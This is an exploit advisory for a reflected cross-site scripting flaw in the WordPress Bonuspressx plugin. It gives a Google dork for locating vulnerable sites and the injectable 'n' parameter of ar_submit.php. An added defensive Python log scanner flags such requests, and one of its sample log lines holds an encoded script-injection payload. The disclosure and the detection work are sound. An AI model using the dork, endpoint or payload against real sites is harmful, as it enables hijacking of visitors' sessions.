############################################
[+] Exploit Title : WordPress Bonuspressx Plugin Cross Site Scripting
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://wordpress.org
[+] Google Dork : inurl:/wp-content/plugins/bonuspressx
[+] Date : 2014-04-23
[+] Tested on : Windows 7, Mozilla Firefox
############################################
[+]  Exploit : Cross Site Scripting
[+]  Location :
[Target]/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2&n=[XSS]
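
Added example, not part of the original advisory or the plugin's code: a check a site owner can run over web server access logs to find requests to the affected script whose n parameter carries HTML metacharacters. It assumes Common Log Format; the function name suspicious_requests and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Script path and reflected parameter as given in the advisory.
VULN_PATH = "/wp-content/plugins/bonuspressx/inc/ar_submit.php"
PARAM = "n"
# Characters needed to break out of an attribute value or open a tag.
HTML_META = re.compile(r"[<>\"']")
# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return (client_ip, decoded_value) for each request to the affected
    script whose n parameter contains HTML metacharacters after decoding."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        # Collapse repeated slashes; WordPress may also sit in a subdirectory,
        # so compare on the path suffix rather than the whole path.
        if not re.sub(r"/+", "/", path).endswith(VULN_PATH):
            continue
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            if HTML_META.search(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Apr/2014:10:00:01 +0000] "GET /wp-content/plugins/'
    'bonuspressx/inc/ar_submit.php?id=2&n=John HTTP/1.1" 200 512',
    '198.51.100.7 - - [23/Apr/2014:10:00:05 +0000] "GET /blog/wp-content/'
    'plugins/bonuspressx/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3E'
    'alert%281%29;%3C/script%3E HTTP/1.1" 200 530',
    '203.0.113.4 - - [23/Apr/2014:10:00:09 +0000] "GET /index.php?n=%3Cb%3E '
    'HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent n={value!r}")
```

A hit means the request was made, not that script ran in a visitor's browser; the fix on the server side is to HTML-encode n before it is written into the response.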
############################################

[+]  Demo :

############################################

Discovered By : Milad Hacking & Cyber Injector

We Love Mohammad

Mail : milad.hacking.blackhat@gmail.com

Home Page : https://www.facebook.com/milad.hacking.5


############################################